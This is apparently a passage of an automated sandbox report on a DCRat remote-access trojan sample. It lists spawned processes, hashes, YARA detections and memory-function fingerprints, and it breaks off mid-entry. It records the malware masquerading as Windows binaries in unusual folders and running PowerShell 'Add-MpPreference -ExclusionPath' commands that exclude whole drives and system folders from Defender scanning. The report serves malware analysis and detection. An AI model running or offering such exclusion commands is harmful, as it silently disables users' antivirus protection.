MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:27:08
Start date:	09/01/2025
Path:	C:\Users\user\Music\ApplicationFrameHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Music\ApplicationFrameHost.exe
Imagebase:	0xaf0000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2197343106.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000D.00000002.2197343106.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:27:08
Start date:	09/01/2025
Path:	C:\Users\user\Music\ApplicationFrameHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Music\ApplicationFrameHost.exe
Imagebase:	0x2e0000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.2060026074.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	20:27:08
Start date:	09/01/2025
Path:	C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe
Imagebase:	0x7c0000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.2155072877.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\DigitalLocker\en-US\vAJjQbsDlJtvByBkfqttADkNAptf.exe
Imagebase:	0xa60000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.2334210958.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Imagebase:	0x7ff75da10000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	20:27:09
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	20:27:10
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	20:27:10
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	20:27:10
Start date:	09/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	20:27:10
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	20:27:10
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	20:27:10
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	20:27:10
Start date:	09/01/2025
Path:	C:\Users\user\Music\ApplicationFrameHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Music\ApplicationFrameHost.exe"
Imagebase:	0xc30000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000032.00000002.1437153809.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	20:27:11
Start date:	09/01/2025
Path:	C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
Imagebase:	0xfc0000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000033.00000002.2244680971.0000000003501000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	20:27:11
Start date:	09/01/2025
Path:	C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SystemTemp\Crashpad\attachments\RuntimeBroker.exe
Imagebase:	0xf10000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000035.00000002.2324073661.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	20:27:11
Start date:	09/01/2025
Path:	C:\Recovery\smartscreen.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\smartscreen.exe
Imagebase:	0x4e0000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000036.00000002.2218726664.0000000002941000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	20:27:12
Start date:	09/01/2025
Path:	C:\Recovery\smartscreen.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\smartscreen.exe
Imagebase:	0x10000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000037.00000002.2057331654.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	20:27:13
Start date:	09/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	60
Start time:	20:27:20
Start date:	09/01/2025
Path:	C:\Users\user\Music\ApplicationFrameHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Music\ApplicationFrameHost.exe"
Imagebase:	0xc20000
File size:	2'691'584 bytes
MD5 hash:	97A026B442F5D5739EA3D8565F3A044D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000003C.00000002.1511882111.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	20:27:20
Start date:	09/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1b0abb92-7d29-4daf-9add-af674e63510b.vbs"
Imagebase:	0x7ff6a13d0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	62
Start time:	20:27:22
Start date:	09/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4df10f3f-bad6-4e3d-936c-dcca7df15912.vbs"
Imagebase:
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FFAAC463595 Relevance: 7.8, Strings: 6, Instructions: 276COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAAC4636CE
"9, xrefs: 00007FFAAC463657
r6, xrefs: 00007FFAAC4636F1
b4, xrefs: 00007FFAAC463770
r6, xrefs: 00007FFAAC4636AB
r6, xrefs: 00007FFAAC463714

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac460000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: "9$b4$r6$r6$r6$r6
API String ID: 0-3175317751
Opcode ID: 7fd79f6b619bf702edb6c029c7a82c13d2348f813426a61c9d8f70d902c99f21
Instruction ID: 9236c45a93c1e80a681ccfd6001e7056a6aee809b2b13bbc745323f31de04c36
Opcode Fuzzy Hash: 7fd79f6b619bf702edb6c029c7a82c13d2348f813426a61c9d8f70d902c99f21
Instruction Fuzzy Hash: 4B91D271A1CA8D8FF794DB6CC8597ACBBE1EB5A314F508179C00EC32DADA6458058B85

Function 00007FFAAC474348 Relevance: 2.7, Strings: 1, Instructions: 1442COMMON

Download Yara Rule

Strings

H;, xrefs: 00007FFAAC4753CB

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: H;
API String ID: 0-3968933927
Opcode ID: d00d1f8a44f3c6cf57aa06ed814f4ef21bdf823b741a8a9a659bfb32efdb5cfe
Instruction ID: 03ad9553580a977b28f61986d5f51e99b53468852bed06e7f038959507a8c588
Opcode Fuzzy Hash: d00d1f8a44f3c6cf57aa06ed814f4ef21bdf823b741a8a9a659bfb32efdb5cfe
Instruction Fuzzy Hash: EEB2AE7080E78A8FFB95DB74C8196F97FE0FF16315F0485BAD40DC6192DE28A5488B82

Function 00007FFAAC4744B8 Relevance: 2.5, Strings: 1, Instructions: 1295COMMON

Download Yara Rule

Strings

H;, xrefs: 00007FFAAC4753CB

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: H;
API String ID: 0-3968933927
Opcode ID: 8654fbb15e3d881ab5331be7c7e00da4b3c3e069677dfc3d4379c3b17ed0ff46
Instruction ID: e05ce26aaf22474de8be626f8ad914e9678c43df2bc72212918ab8cd3419f0d1
Opcode Fuzzy Hash: 8654fbb15e3d881ab5331be7c7e00da4b3c3e069677dfc3d4379c3b17ed0ff46
Instruction Fuzzy Hash: 9AA29F7080E79ACFFB95DB74C8196F97BE0FF16315F0485BAD40DC6192DE28A5488B82

Function 00007FFAAC474709 Relevance: 2.4, Strings: 1, Instructions: 1114COMMON

Download Yara Rule

Strings

H;, xrefs: 00007FFAAC4753CB

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: H;
API String ID: 0-3968933927
Opcode ID: c2d129d0465ce8f1907755f342b81f8e5bc9bbaa5def9b546c83ee589e6a3df3
Instruction ID: a80767d744edb13c69ab1489e3cdc7deb3a3bd2a12bebf8d33f57c7ce1696c7a
Opcode Fuzzy Hash: c2d129d0465ce8f1907755f342b81f8e5bc9bbaa5def9b546c83ee589e6a3df3
Instruction Fuzzy Hash: EE82907080E69ACFFB95DB74C8196F97BF0FF16315F0485BAD40DC6192DE28A5488B82

Function 00007FFAAC474838 Relevance: 2.3, Strings: 1, Instructions: 1016COMMON

Download Yara Rule

Strings

H;, xrefs: 00007FFAAC4753CB

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: H;
API String ID: 0-3968933927
Opcode ID: 74fb13658d1e63a2434b28a6eded055f2c99a2e0c5dbd4c69ba8009ea401f860
Instruction ID: e01f1349ee011ed0b34d09ab72f8dac14c826c7ccfdc298fe22f704067e9d1ba
Opcode Fuzzy Hash: 74fb13658d1e63a2434b28a6eded055f2c99a2e0c5dbd4c69ba8009ea401f860
Instruction Fuzzy Hash: 8E72A07080E69ACFFB95DB74C8196F97BF0FF16315F0485BAD40DC6192DE28A5488B82

Function 00007FFAAC470725 Relevance: 1.7, Strings: 1, Instructions: 487COMMON

Download Yara Rule

Strings

X, xrefs: 00007FFAAC4708EB

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID: X
API String ID: 0-3240521626
Opcode ID: 45ff5356c5abdaf1cb27fc7e84a78ec8321aeaae330e99c4d245e469fc2b80a4
Instruction ID: 1a1777360029992d0ad09959caace7fd8ff7976ead00cc25a16ce2c72c7453e4
Opcode Fuzzy Hash: 45ff5356c5abdaf1cb27fc7e84a78ec8321aeaae330e99c4d245e469fc2b80a4
Instruction Fuzzy Hash: 91025070D0A659CFEB58DB64C459ABDBBB1FF19305F1081BAD00ED3292CB38A945CB85

Function 00007FFAAC4737B8 Relevance: .7, Instructions: 725COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0270627435873868c1ac1061ef615015e5559b31e62661c02e20caa4b3fe3ea
Instruction ID: 50b36e6c9d448bc929d6d456a2d711cf7c69cd422e8a25e3cc6f9945e530e8b6
Opcode Fuzzy Hash: d0270627435873868c1ac1061ef615015e5559b31e62661c02e20caa4b3fe3ea
Instruction Fuzzy Hash: 9042A07090D68A8FEB95EB74C85D6B97BE0FF1A305F0085BAD40DC7192DE38A548CB81

Function 00007FFAAC471C0B Relevance: .5, Instructions: 504COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523f1ae9e3ce6c712c38c8e82700af417cab3dfb14b6ae670ce4a0bb43f2d7a5
Instruction ID: 86841070fd554c46e129b2c5bb72750af7cf395edc31cf165f395992b03f3fbc
Opcode Fuzzy Hash: 523f1ae9e3ce6c712c38c8e82700af417cab3dfb14b6ae670ce4a0bb43f2d7a5
Instruction Fuzzy Hash: 1612CF7080969A8FEB59DF64C8596F97BF1FF5A304F0085BAD40DD7192DB38A948CB80

Function 00007FFAAC475E91 Relevance: .5, Instructions: 453COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9481c93b8f23a6570a06ac4c5c5b754557c51e1e7d2697bcadde4d4ef045c452
Instruction ID: 217a17b58c5719ea93c8f4510d6b69c6771b0281a4e8b58bb778b455c0f79b92
Opcode Fuzzy Hash: 9481c93b8f23a6570a06ac4c5c5b754557c51e1e7d2697bcadde4d4ef045c452
Instruction Fuzzy Hash: A5E1A074D0969A8FFB95EB24C85D6F97BF1FF1A304F0085BAD40EC6192DE34A5488B81

Function 00007FFAAC4722D0 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4b5eb5cccf4d351765242151a4940e970b4993bc9ba496b8b8756b35d3b721
Instruction ID: b09bcaf31bec496d6d0c6c278010c33f49569d09827eddbd64a99f0700f4aee0
Opcode Fuzzy Hash: 4b4b5eb5cccf4d351765242151a4940e970b4993bc9ba496b8b8756b35d3b721
Instruction Fuzzy Hash: 22D1EF7080969ACFEB69DF34C8595FA7BF0FF5A304F0485BAD409C7592DA38A548CB80

Function 00007FFAAC476CF1 Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1776547964.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffaac470000_cvXu2RR10n.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34d4129bd1922bffa3505aecbe32778ab47d1b154a01824e7b7408182ce825e0
Instruction ID: 98c04192a0e138fa3f4a0ef5263f18eb3c587d5bc45af1806ac0156ecd972660
Opcode Fuzzy Hash: 34d4129bd1922bffa3505aecbe32778ab47d1b154a01824e7b7408182ce825e0
Instruction Fuzzy Hash: 15A1C27480E68A8FFB4ADF64C8596F93FA1EF56304F0485BAD40DC71A2CA39A448C791

Function 00007FFAAC47DA42 Relevance: 4.1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

